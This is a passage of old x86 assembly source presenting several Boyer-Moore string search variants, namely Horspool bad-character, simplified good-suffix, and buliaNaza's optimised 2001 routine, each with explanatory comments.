    sub esi, lpSource           ; sub source from ESI
    mov eax, esi                ; put length in eax
    jmp Cleanup

  No_Match:
    mov eax, -1

  Cleanup:
    pop edi
    pop esi
    pop ebx

    ret

BMBinSearch endp

; #########################################################################

    end

    @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
    @                                                               @
    @  The Horspool style variation using the BAD CHARACTER shift   @
    @                                                               @
    @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@


; #########################################################################

    .486
    .model flat, stdcall  ; 32 bit memory model
    option casemap :none  ; case sensitive

    .code

; #########################################################################

BMHBinsearch proc startpos:DWORD,
                  lpSource:DWORD,srcLngth:DWORD,
                  lpSubStr:DWORD,subLngth:DWORD

    LOCAL cval:DWORD
    LOCAL shift_table[256]:DWORD

    push ebx
    push esi
    push edi

    mov ebx, subLngth

    cmp ebx, 1
    jg @F
    mov eax, -2                 ; string too short, must be > 1
    jmp BMHout
  @@:

    mov esi, lpSource
    add esi, srcLngth
    sub esi, ebx
    mov edx, esi                ; set Exit Length

  ; ----------------------------------------
  ; load shift table with value in subLngth
  ; ----------------------------------------
    mov ecx, 256
    mov eax, ebx
    lea edi, shift_table
    rep stosd

  ; ----------------------------------------------
  ; load decending count values into shift table
  ; ----------------------------------------------
    mov ecx, ebx                ; SubString length in ECX
    dec ecx                     ; correct for zero based index
    mov esi, lpSubStr           ; address of SubString in ESI
    lea edi, shift_table

    xor eax, eax

  Write_Chars:
    mov al, [esi]               ; get the character
    inc esi
    mov [edi+eax*4], ecx        ; write shift for each character
    dec ecx                     ; to ascii location in table
    jnz Write_Chars

  ; -----------------------------
  ; set up for main compare loop
  ; -----------------------------
    mov ecx, ebx
    dec ecx
    mov cval, ecx

    mov esi, lpSource
    mov edi, lpSubStr
    add esi, startpos           ; add starting position

; %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

  Main_Loop:
    sub eax, eax                ; zero EAX before partial write
    mov al, [esi+ecx]
    cmp al, [edi+ecx]           ; cmp characters in ESI / EDI
    jne Get_Shift               ; if not equal, get next shift
    dec ecx
    jns Main_Loop

    jmp Matchx

  Get_Shift:
    inc esi                     ; inc esi for minimum shift
    cmp ebx, shift_table[eax*4] ; cmp subLngth to char shift
    jne Exit_Test
    add esi, ecx                ; add bad char shift
  Exit_Test:
    mov ecx, cval               ; reset counter in compare loop
    cmp esi, edx                ; test for exit condition
    jl Main_Loop

    jmp MisMatch

; %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

  Matchx:
    sub esi, lpSource           ; sub source from ESI
    mov eax, esi                ; put length in eax
    jmp BMHout

  MisMatch:
    mov eax, -1

  BMHout:
    pop edi
    pop esi
    pop ebx

    ret

BMHBinsearch endp

; #########################################################################

    end

        @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
        @                                                        @
        @   The simplified version using the GOOD SUFFIX shift   @
        @                                                        @
        @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@

; #########################################################################

    .486
    .model flat, stdcall  ; 32 bit memory model
    option casemap :none  ; case sensitive

    .code

; #########################################################################

SBMBinSearch proc startpos:DWORD,
                  lpSource:DWORD,srcLngth:DWORD,
                  lpSubStr:DWORD,subLngth:DWORD

    LOCAL shift_table[256]:DWORD

    push ebx
    push esi
    push edi

    mov edx, subLngth

    cmp edx, 1
    jg @F
    mov eax, -2                 ; string too short, must be > 1
    jmp Cleanup
  @@:

    mov esi, lpSource
    add esi, srcLngth
    sub esi, edx
    mov ebx, esi                ; set Exit Length

  ; ----------------------------------------
  ; load shift table with value in subLngth
  ; ----------------------------------------
    mov ecx, 256
    mov eax, edx
    lea edi, shift_table
    rep stosd

  ; ----------------------------------------------
  ; load decending count values into shift table
  ; ----------------------------------------------
    mov ecx, edx                ; SubString length in ECX
    dec ecx                     ; correct for zero based index
    mov esi, lpSubStr           ; address of SubString in ESI
    lea edi, shift_table

    xor eax, eax

  Write_Shift_Chars:
    mov al, [esi]               ; get the character
    inc esi
    mov [edi+eax*4], ecx        ; write shift for each character
    dec ecx                     ; to ascii location in table
    jnz Write_Shift_Chars

  ; -----------------------------
  ; set up for main compare loop
  ; -----------------------------

    mov esi, lpSource
    mov edi, lpSubStr
    dec edx
    xor eax, eax                ; zero EAX
    add esi, startpos           ; add starting position

    jmp Cmp_Loop

; %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

  Calc_Suffix_Shift:
    add ecx, shift_table[eax*4] ; add shift value to loop counter
    sub ecx, edx                ; sub pattern length
    jns Pre_Compare
    mov ecx, 1                  ; minimum shift is 1

  Pre_Compare:
    add esi, ecx                ; add suffix shift
    mov ecx, edx                ; reset counter for compare loop

  Exit_Text:
    cmp ebx, esi                ; test exit condition
    jl No_Match

    xor eax, eax                ; clear EAX for following partial writes
    mov al, [esi+ecx]
    cmp al, [edi+ecx]           ; cmp characters in ESI / EDI
    je @F
    add esi, shift_table[eax*4]
    jmp Exit_Text
  @@:
    dec ecx

    xor eax, eax                ; clear EAX for following partial writes
  Cmp_Loop:
    mov al, [esi+ecx]
    cmp al, [edi+ecx]           ; cmp characters in ESI / EDI
    jne Calc_Suffix_Shift       ; if not equal, get next shift
    dec ecx
    jns Cmp_Loop
    jmp Match                   ; match on fall through

; %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

  Match:
    sub esi, lpSource           ; sub source from ESI
    mov eax, esi                ; put length in eax
    jmp Cleanup

  No_Match:
    mov eax, -1

  Cleanup:
    pop edi
    pop esi
    pop ebx

    ret

SBMBinSearch endp

; #########################################################################

    end

********************************** END *************************************


                                         Fastest Binary String Search Algorithm
                                         by buliaNaza


; Fastest binary string search algo with
; PPlain and PMMX type of processors
; <c> 2001 by buliaNaza         ;
;                               ;
.data?                          ;
 align 4                        ; !!!
 skip_table   DD   256 Dup(?)   ; skip table
;                               ;
;...............................;
; Usage: esi ->pBuffer          ; esi->buffer with bytes to be searched through
;        ebp = lenBuffer        ; ebp =length of the buffer
;        ebx ->pSrchData        ; ebx->pointer to data to be searched for
;        edx = lenSrchData      ; edx=length of data  to be searched for
;        edi ->pskip_table      ; edi->pointer to skip table (must be aligned)
;        call BMCaseSNext       ;
;.................................;
.code                             ;
BMCaseSNext:                      ;
        cmp  edx, 4               ; edx = length of data to be searched for
        jg   Boyer_Moore          ;
;... Brute Force Search ..........; for 4 digits or less only!
        mov  edi, [ebx]           ; edi = dword of data to be searched for
        mov  ecx, 5               ;
        sub  ecx, edx             ;
        lea  eax, [esi+edx-1]     ; eax->new starting address in pBuffer
        shl  ecx, 3               ; *8
        mov  bl,  [ebx+edx-1]     ; get last byte only
        mov  bh,  bl              ; copy in bh         
        bswap edi                 ;
        shr  edi, cl              ;
        add  ebp, esi             ; ebp ->end of buffer
        and  ebx, 0FFFFh          ; ebx = need the bx word only
        mov  ecx, ebx             ;
        mov  esi, edx             ; esi=edx = length of data to be searched for
        shl  ecx, 16              ;
        test eax, 3               ;
        lea  ebx, [ebx+ecx]       ;
        jz   Search_2             ;
Unalign_1:                        ;
        cmp  eax, ebp             ; ebp ->end of buffer
        jge  Not_found            ;
        mov  cl, [eax]            ;
        inc  eax                  ;
        cmp  cl, bl               ;
        jz   Compare_1            ;
Search_1:                         ;
        test eax, 3               ;
        jnz  Unalign_1            ;
Search_2:                         ;
        cmp  eax, ebp             ;u ebp ->end of buffer
        jge  Not_found            ;v
        mov  ecx, [eax]           ;u scasb for the last byte from pSrchData
        add  eax, 4               ;v
        xor  ecx, ebx             ;u
        mov  edx, 7EFEFEFFh       ;v
        add  edx, ecx             ;u
        xor  ecx, -1              ;v
        xor  ecx, edx             ;u
        mov  edx, [eax-4]         ;v
        and  ecx, 81010100h       ;u
        jz   Search_2             ;v
                                  ;
        cmp  dl, bl               ;
        jz   Minus_4              ;
        cmp  dh, bl               ;
        jz   Minus_3              ;
        shr  edx, 16              ;
        cmp  dl, bl               ;
        jz   Minus_2              ;
        cmp  dh, bl               ;
        jz   Compare_1            ;
        jnz  Search_2             ;
Minus_2:                          ;
        dec  eax                  ;
        jnz  Compare_1            ;
Minus_4:                          ;
        sub  eax, 3               ;
        jnz  Compare_1            ;
Minus_3:                          ;
        sub  eax, 2               ;
Compare_1:                        ;
        mov  edx, edi             ;
        cmp  eax, ebp             ; ebp ->end of buffer
        jg   Not_found            ;
        cmp  esi, 1               ;
        jz   Found_1              ;
        cmp  dl, [eax-2]          ; eax->pBuffer
        jnz  Search_1             ;
        cmp  esi, 2               ;
        jz   Found_1              ;
        cmp  dh, [eax-3]          ; eax->pBuffer
        jnz  Search_1             ;
        cmp  esi, 3               ;
        jz   Found_1              ;
        shr  edx, 16              ;
        mov  cl, [eax-4]          ; eax->pBuffer
        cmp  dl, cl               ;
        jnz  Search_1             ;
Found_1:                          ;
        sub  eax, esi             ; in eax->pointer to 1st
        ret                       ; occurrence of data found in pBuffer
;...Boyer Moore Case Sens Next Search...;
Boyer_Moore:                      ;
        add  esi, ebp             ; esi->pointer to the last byte of pBuffer
        lea  ebx, [ebx+edx-1]     ; ebx->pointer to the last byte of pSrchData
        neg  edx                  ; edx= -lenSrchData
        mov  ecx, edx             ; ecx = edx = -lenSrchData
        add  ebp, edx             ; sub lenSrchData from lenBuffer
        mov  eax, 256             ; eax = counter
        xor  ebp, -1              ; not ebp->current negative index
MaxSkipLens:                      ;
        mov  [eax*4+edi-4], edx   ; filling up the skip_table with -lenSrchData
        mov  [eax*4+edi-8], edx   ;
        mov  [eax*4+edi-12], edx  ;
        mov  [eax*4+edi-16], edx  ;
        mov  [eax*4+edi-20], edx  ;
        mov  [eax*4+edi-24], edx  ;
        mov  [eax*4+edi-28], edx  ;
        mov  [eax*4+edi-32], edx  ;
        mov  [eax*4+edi-36], edx  ;
        mov  [eax*4+edi-40], edx  ;
        mov  [eax*4+edi-44], edx  ;
        mov  [eax*4+edi-48], edx  ;
        mov  [eax*4+edi-52], edx  ;
        mov  [eax*4+edi-56], edx  ;
        mov  [eax*4+edi-60], edx  ;
        mov  [eax*4+edi-64], edx  ;
        mov  [eax*4+edi-68], edx  ;
        mov  [eax*4+edi-72], edx  ;
        mov  [eax*4+edi-76], edx  ;
        mov  [eax*4+edi-80], edx  ;
        mov  [eax*4+edi-84], edx  ;
        mov  [eax*4+edi-88], edx  ;
        mov  [eax*4+edi-92], edx  ;
        mov  [eax*4+edi-96], edx  ;
        mov  [eax*4+edi-100], edx ;
        mov  [eax*4+edi-104], edx ;
        mov  [eax*4+edi-108], edx ;
        mov  [eax*4+edi-112], edx ;
        mov  [eax*4+edi-116], edx ;
        mov  [eax*4+edi-120], edx ;
        mov  [eax*4+edi-124], edx ;
        mov  [eax*4+edi-128], edx ;
        sub  eax, 32          ;
        jne  MaxSkipLens      ; loop while eax=0
SkipLens:                     ;
        mov  al, [ecx+ebx+1]  ;u filling up with the real negative offset of
        inc  ecx              ;v every byte from the pSrchData, starting from
        mov  [eax*4+edi], ecx ;u the last to the first, at the offset in
        jne  SkipLens         ;v skip_table equal to the ASCII code of the
                              ;  byte, multiplied by 4
Search:                       ;  the main searching loop-> FAST PART
        mov  al, [esi+ebp]    ;u get a byte  from pBuffer ->esi +ebp
        mov  ecx, edx         ;v ecx=edx= -lenSrchData
        sub  ebp, [eax*4+edi] ;u sub negative offset for this byte from
                              ;  skip_table 
        jc   Search           ;v if dword ptr [eax*4+edi] AND ebp <> 0 loop
                              ;  again
        lea  ebp, [ebp+esi+1] ;u current negative index -> next byte (+1)
        jge  Not_found        ;v end of pBuffer control (if ebp>=0 end)
                              ; compare previous bytes from pSrchData (->ebx)
Compare:                      ; and current offset in pBuffer (->ebp)->SLOW
                              ; PART
        mov  eax, [ebx+ecx+1] ; one dword from pSrchData -> ebx
        inc  ecx              ; ecx = -lenSrchData
        jz   Found            ; if ecx = 0 Found&Exit
        cmp  al, [ebp+ecx-1]  ; ebp->pBuffer
        jnz  Not_equal        ;
        inc  ecx              ; ecx = -lenSrchData
        jz   Found            ; if ecx = 0 Found&Exit
        cmp  ah, [ebp+ecx-1]  ; ebp->pBuffer
        jnz  Not_equal        ;
        inc  ecx              ; ecx = -lenSrchData
        jz   Found            ; if ecx=0 Found&Exit
        shr  eax, 16          ;
        inc  ecx              ;
        cmp  al, [ebp+ecx-2]  ; ebp->pBuffer
        jnz  Not_equal        ;
        test ecx, ecx         ; ecx = -lenSrchData
        jz   Found            ; if ecx=0 Found&Exit
        cmp  ah, [ebp+ecx-1]  ; ebp->pBuffer
        jz   Compare          ;
Not_equal:                    ;
        sub  eax, eax         ; eax = 0
        sub  ebp, esi         ; restore ebp->current negative index
        jl   Search           ; end of pBuffer control
Not_found:                    ;
        or   eax, -1          ; Exit with flag Not_Found eax=-1
        ret                   ;
Found:                        ;
        lea  eax, [ebp+edx]   ; in eax->pointer to 1st
        ret                   ; occurrence  of data found in pBuffer


::/ \::::::.
:/___\:::::::.
/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.
:::\_____\:::::::::::.......................................................FIN